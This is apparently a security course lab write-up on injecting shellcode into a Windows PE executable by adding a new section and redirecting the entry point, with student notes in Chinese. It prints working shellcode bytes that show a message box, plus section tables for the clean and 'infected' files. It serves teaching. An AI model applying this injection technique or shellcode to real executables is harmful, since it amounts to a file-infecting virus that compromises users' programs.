Part II Code Injection
In this part you will see a program that inject a piece of shellcode to an existing PE file. The shellcode will pop up a message box and then run the original code the PE file.
- Download code.c, peinj.cpp and hello.exe.
- Read code.c and peinj.cpp. Make sure you will understand the principle of code injection.
- code.c
- will generate the shellcode to be injected to hello.exe. The code between label _start and _end is the assembly version of the shellcode. And the loop in the followed C code will generate the correspondent shellcode.
- peinj.cpp
- is the source code that do the injection work. The to-be-injected shellcode is stored in a global array injcode1, which is empty at present. Function PEOpenFile() is almost the same as the one you have seen in the previous part. main() function loads hello.exe to the memory by PEOpenFile() firstly, then calls PEInject() to add a new section which contains the shellcode and alter the entry pointer to the new section, and finally uses PESaveFile() to store the new PE image to hello1.exe.
- Compile code.c and run the generated executable file. Paste the shell code to peinj.cpp.
- Compile peinj.cpp and run the generated executable file.
- Run hello.exe and hello1.exe, and observe the different behaviors between them.
- Use PEdump you make before or PEditor/Stud_PE to analyze hello.exe and hello1.exe. Then fill up these tables.
看懂code.c文件的功能,然后再命令行获取shellcode.
C:\>code
0x60,0x55,
0x8B,0xEC,0x83,0xEC,0x14,0xE8,0x77,0x00,
0x00,0x00,0x89,0x45,0xFC,0x50,0xE8,0x8C,
0x00,0x00,0x00,0x89,0x45,0xF8,0x83,0xC4,
0x04,0xE8,0x0D,0x00,0x00,0x00,0x4C,0x6F,
0x61,0x64,0x4C,0x69,0x62,0x72,0x61,0x72,
0x79,0x41,0x00,0xFF,0x75,0xFC,0xFF,0x55,
0xF8,0x89,0x45,0xF4,0xE8,0x0B,0x00,0x00,
0x00,0x75,0x73,0x65,0x72,0x33,0x32,0x2E,
0x64,0x6C,0x6C,0x00,0xFF,0x55,0xF4,0x89,
0x45,0xF0,0xE8,0x0C,0x00,0x00,0x00,0x4D,
0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6F,
0x78,0x41,0x00,0xFF,0x75,0xF0,0xFF,0x55,
0xF8,0x89,0x45,0xEC,0x6A,0x00,0xE8,0x01,
0x00,0x00,0x00,0x00,0xE8,0x06,0x00,0x00,
0x00,0x48,0x65,0x6C,0x6C,0x6F,0x00,0x6A,
0x00,0xFF,0x55,0xEC,0x8B,0xE5,0x5D,0xEB,
0x6B,0x55,0x8B,0xEC,0x56,0x57,0x64,0xA1,
0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,
0x70,0x1C,0x8B,0x06,0x8B,0x78,0x08,0x8B,
0xC7,0x5F,0x5E,0x8B,0xE5,0x5D,0xC3,0x55,
0x8B,0xEC,0x52,0x57,0x56,0x8B,0x5D,0x08,
0x8B,0x43,0x3C,0x8B,0x54,0x03,0x78,0x03,
0xD3,0x8B,0x4A,0x18,0x8B,0x7A,0x20,0x03,
0xFB,0x49,0x8B,0x34,0x8F,0x03,0xF3,0xB8,
0x47,0x65,0x74,0x50,0x39,0x06,0x75,0xF1,
0xB8,0x72,0x6F,0x63,0x41,0x39,0x46,0x04,
0x75,0xE7,0x8B,0x7A,0x24,0x03,0xFB,0x66,
0x8B,0x0C,0x4F,0x8B,0x7A,0x1C,0x03,0xFB,
0x8B,0x04,0x8F,0x03,0xC3,0x56,0x57,0x52,
0x8B,0xE5,0x5D,0xC3,0xE8,0x00,0x00,0x00,
0x00,0x5D,0x81,0xED,0x01,0x11,0x40,0x00,
0x8B,0x85,0x20,0x11,0x40,0x00,0x03,0x85,
0x24,0x11,0x40,0x00,0x89,0x44,0x24,0x1C,
0x61,0x50,0x33,0xC0,0xC3,0xFF,0xE0,0x90,
0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,
size(dec) : 282
param1 offset : 0x112
param2 offset : 0x116
将shellcode拷贝到peinj.cpp中,在按照下面的命令行编译:
C:\>cl peinj.cpp user32.lib
将win.exe文件与peinj.exe文件放在一起,之后,双击peinj.exe,就会发现win.exe被感染,当然,我将它生成另一个文件win_inj.exe以示区别做研究。最后用Stu_PE等工具分析它的section,就会发现被感染的文件比没有被感染的文件多一个节,我把它取名为new。实验结果如下:
The entry address:0001121C
No | Name | VSize | VOffset | RSize | ROffset | Charact. |
01 | .textbss | 00010000 | 00001000 | 00000000 | 00000000 | E00000A0 |
02 | .text | 00003CF9 | 00011000 | 00003E00 | 00000400 | 60000020 |
03 | .rdata | 00001C3A | 00015000 | 00001E00 | 00004200 | 40000040 |
04 | .data | 0000077C | 00017000 | 00000200 | 00006000 | C0000040 |
05 | .idata | 00000ACC | 00018000 | 00000C00 | 00006200 | C0000040 |
06 | .rsrc | 0000F069 | 00019000 | 0000F200 | 00006E00 | 40000040 |
07 | .reloc | 00000576 | 00029000 | 00000600 | 00016000 | 42000040 |
The entry address:0002A000
No | Name | VSize | VOffset | RSize | ROffset | Charact. |
01 | .textbss | 00010000 | 00001000 | 00000000 | 00000000 | E00000A0 |
02 | .text | 00004000 | 00011000 | 00003E00 | 00000400 | 60000020 |
03 | .rdata | 00002000 | 00015000 | 00001E00 | 00004200 | 40000040 |
04 | .data | 00001000 | 00017000 | 00000200 | 00006000 | C0000040 |
05 | .idata | 00001000 | 00018000 | 00000C00 | 00006200 | C0000040 |
06 | .rsrc | 00010000 | 00019000 | 0000F200 | 00006E00 | 40000040 |
07 | .reloc | 00001000 | 00029000 | 00000600 | 00016000 | 42000040 |
08 | .new | 00001000 | 0002A000 | 00000200 | 00016600 | C0000040 |